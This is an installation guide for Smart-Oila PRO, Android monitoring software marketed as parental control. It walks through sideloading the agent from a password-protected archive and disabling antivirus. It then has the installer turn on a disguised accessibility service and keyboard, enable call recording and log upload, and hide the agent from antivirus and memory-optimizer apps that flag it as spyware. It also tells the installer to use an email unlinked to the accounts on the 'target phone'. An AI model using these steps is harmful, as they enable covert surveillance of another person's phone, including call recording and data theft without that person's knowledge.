How to install Smart-Oila PRO 1.6.52 for Android 2.2-4.0

• Device Settings-->Security-->Unknown sources (Allow installation of non-Market applications)
• Login please your personal account on Smart-Oila.uz site;
• Go to Download page and find Smart-Oila PRO for Android download link or button.
• First you need to uninstall Smart-Oila Parental Control (old version of free Smart-Oila for Android) application, because it is incompatible with Smart-Oila PRO.
• Uninstall Helper Service, Smart-Oila Helper or TalkBackTS application, if it was installed before.
• Download the archive of Smart-Oila PRO for Android,
• Install RAR application from Google Play Market. Open it and find the archive of Smart-Oila PRO.
• Unzip it into a new folder.
  Or, you can download the archive onto a computer and unzip it there, and after that copy it to the phone through USB cable.
• Inside the archive you find another archive, with a password. Extract it into a new folder. Password for archive is 12345
• Disable for a while antivirus programs.
• Open the folder and install PRO_agent.apk.

Before install TalkBackTS, you have to manually uninstall previous version of TalkBackTS application, if it was installed before.

• Install TalkBackTS_for_2.3.apk;
• Open Android’s Settings, Accessibility, TalkBackTS → ON.
• On a smartphone you can call *123456# to launch the control panel of Smart-Oila PRO.

On a tablet install tkeyboard.apk from For tablets folder. Device Settings-->Language&input --> KMA_keyboard → ON. Click on the icon in right part of window, on the level of KMA_keyboard. Insert the code *123456# in text field and press Launch Control Panel.

• Click Settings. Configure all features you need. Note, that some menus have sub-menu.
• Find option Connect to server → Upload Logs. Check it. Select a server to upload→Smart-Oila.uz. In the field Device ID insert your e-mail address, you have used for registration. This address MUST NOT be the same, as you used in GMAIL, EMAIL and Play Market on target phone. Click OK. The server will automatically create a new virtual device with its own ID. This ID will be automatically inserted in device ID field. Login your user account on Smart-Oila.uz and remove the empty device. Then try again to connect Smart-Oila PRO to server.
• If you want to connect Smart-Oila PRO application to an existing virtual device, insert its ID in device ID field.

• Some Android smartphones can’t track the calls. It may be caused by the concurrency with other sound-recording applications.
• Many Android smartphones record only one side of a conversation. Google politics for Android 4.x disallows to record the sound from the speakers of the phone. Some manufacturers don't respect this politics, and on several types of phones, using Smart-Oila Pro is possible to record both voices. If you want to buy a phone for your child and install monitoring application there, we recommend installing Smart-Oila PRO on a phone at phone store, verify, if it records the both sides, before you buy this phone.
• Sometimes Smart-Oila application may be stopped by system or memory-optimizing programs. Add Smart-Oila PRO to the list of exceptions to this application.
• Smart-Oila PRO can be detected as a spyware by antivirus applications. Configure them to ignore monitoring agent.
• TalkBackTS is not compatible with Samsung keyboard (it doesn't allow switching the languages).

Users who use their phones in a very active way - call or receive calls, take photos with smartphones - sometimes may experience slow upload of the data to the server.  This may happen when the user configured Smart-Oila to track all the offered features, though the phone isn't very advanced. Read more...

You have changed a standard password *123456# to a new one, take care to remember it! The password cannot be restored. If you still can not remember the password, follow the instruction:

1. uninstall the app from your device
   - Settings-->Applications-->Manage applications
2. set up Smart-Oila again.

• If you experience any difficulties regarding the application, please send us a Troubleshooting report. It will help us better understand the technical issue. In the application main window press menu button (similar to all Android devices).
• Tap on Troubleshoot as it is shown on the screenshot and then send the Bug report.

• Clean master - completely incompatible. It stops background processes without asking a user.
• ES file manager - completely incompatible: permanently finds background processes and proposes a user to stop them, ignoring exception list.
• Smart-Oila parental control: before installing Smart-Oila PRO, you need to uninstall this simple version. Address conflict.
• StaffCounter monitoring agent for Android: Smart-Oila-family application. The same as Smart-Oila parental control.
• aQooQoo monitoring agent for Android: Smart-Oila-family application. The same as Smart-Oila parental control.
• Dr. Web antivirus application - relative compatible. It finds Smart-Oila in background processes. Just click Ignore, when the notification appears.
• Other antivirus or memory-optimizing applications may be completely or relative incompatible, depending on exception list using.

• Launch please Android menu, Settings, Applications.
• Select “manage applications”.
• Find KMA agent service and press on it. Click Uninstall. Find TalkBackTS, KMA_keyboard and uninstall it as well
